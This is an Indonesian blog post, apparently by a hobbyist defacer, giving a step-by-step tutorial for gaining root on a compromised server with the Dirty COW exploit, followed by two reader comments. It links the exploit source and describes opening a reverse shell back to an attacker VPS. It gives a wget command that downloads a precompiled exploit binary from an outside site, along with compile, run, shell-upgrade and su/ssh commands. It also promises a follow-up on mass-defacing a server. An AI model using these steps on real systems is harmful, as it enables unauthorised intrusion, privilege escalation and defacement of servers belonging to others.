• oke, sekian lama akhirnya w bisa ngeblog lagi. laptop w rusak di kipas coolernya dan sekarang ga bisa nyala total. sementara ini gw pake pc jadul taun 2008-an :') jgn banyak cocot lanjut.
kenampakannya..

Bahan-Bahan.
  • VPS
    pastinya lah yak. ini dah wajib
  • Localroot
  • niat tekad dan tidak napsuan :'v 
localroot bisa pake dirtycow di https://github.com/FireFart/dirtycow/blob/master/dirty.c

Langkah-Langkah
  • backconnect (pastilah tau lah tinggal masukin ip vps ama port yg sesuai :v)
  • upload localroot ato bisa pake wget ato curl
  • compile localroot dengan gcc dengan caragcc -pthread dirty.c -o apalahnamanyaasaljadi -lcrypt

    nb: misal command gccnya error bisa wget https://con7ext-security.com/localroot/dirty (jadi langsung chmod saja)
  • chmod +x apalahnamanyaasaljadi
  • ./apalahnamanyaasaljadi
    masukan password baru.. dan tunggu
nb: kalau disuruh hapus /tmp/passwd.bak bisa dengan command rm /tmp/passwd.bak kalau command rm permission. lain kali gw bahas dinext time.

nah pointnya disini. lu cek username udah keubah belum. bisa cek dengan command ini cat /etc/passwd kalo udah keganti firefart berarti dah ke root

kita mau akses user root tapi sebelum itu command python -c 'import pty;pty.spawn("/bin/bash")' biar bisa pake command bash.

lanjut kita pake su firefart *jika permission bisa pake ssh


akses menggunakan ssh dengan cara. ssh firefart@localhost

ohh iya, nanti gw akan buat post cara mass deface satu server pake file php tungguin ya ;p

nah itu tutorial yg bisa gw kasih ke kalian, maap kalo ada kekurangan. kalau masih binggung bisa liat tutorial diblog lain ato di channel youtube orang. karena gw juga belajar dari segalanya walaupun banyak pembatas yang ga bisa di raih :( oke see you next time..

2 Comments

  1. SS NYA BANG, BIAR GW NGARTI :V BINGUNG KALO TULISAN DOANG :V

    ReplyDelete
    Replies
    1. ga ada target bang :'v jadi nanti saya update lagi :D

      Delete

Post a Comment